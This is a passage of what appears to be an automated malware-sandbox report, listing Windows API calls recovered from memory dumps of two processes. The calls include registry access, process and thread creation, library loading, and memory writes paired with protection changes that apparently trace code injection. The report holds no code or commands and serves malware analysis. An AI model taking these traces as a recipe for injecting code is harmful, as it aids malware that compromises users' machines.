                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseOpen
                                                                                  • String ID:
                                                                                  • API String ID: 47109696-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RegQueryValueExA.KERNELBASE ref: 00DB87D3
                                                                                  • RegQueryValueExA.KERNELBASE ref: 00DB8857
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateOpen
                                                                                  • String ID:
                                                                                  • API String ID: 436179556-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueueThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3600083758-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • RtlDeleteBoundaryDescriptor.NTDLL ref: 00DAA876
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: BoundaryDeleteDescriptor
                                                                                  • String ID:
                                                                                  • API String ID: 3203483114-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00DC3A14: RegCreateKeyA.ADVAPI32 ref: 00DC3A37
                                                                                  • RegQueryValueExA.KERNELBASE ref: 00DB678A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 2711935003-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 00DCC130: NtWriteVirtualMemory.NTDLL ref: 00DCC14F
                                                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DAAD00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$MemoryProtectWrite
                                                                                  • String ID:
                                                                                  • API String ID: 1789425917-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • FindCloseChangeNotification.KERNELBASE ref: 00DCD0F5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000021.00000002.847341542.0000000000DA1000.00000020.00000001.sdmp, Offset: 00DA1000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: lstrcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1534048567-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions

                                                                                  Executed Functions

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationQueryToken$Close
                                                                                  • String ID: 0
                                                                                  • API String ID: 459398573-4108050209
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocCreateFreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 2341667014-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateUser$MutexNameQueueThread
                                                                                  • String ID:
                                                                                  • API String ID: 2503873790-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.848114153.000001E7A4371000.00000040.00000001.sdmp, Offset: 000001E7A4371000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID: ($(
                                                                                  • API String ID: 2711935003-222463766
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID: H
                                                                                  • API String ID: 1029625771-2852464175
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ContinueHandlerVectored
                                                                                  • String ID:
                                                                                  • API String ID: 3758255415-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3356406503-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateOpen
                                                                                  • String ID:
                                                                                  • API String ID: 436179556-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueueThreadUser
                                                                                  • String ID:
                                                                                  • API String ID: 3600083758-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: CreateQueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 2711935003-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: ChangeCloseFindNotification
                                                                                  • String ID:
                                                                                  • API String ID: 2591292051-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000023.00000002.847864090.000001E7A4331000.00000020.00000001.sdmp, Offset: 000001E7A4331000, based on PE: false
                                                                                  Similarity
                                                                                  • API ID: lstrcmp
                                                                                  • String ID:
                                                                                  • API String ID: 1534048567-0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Non-executed Functions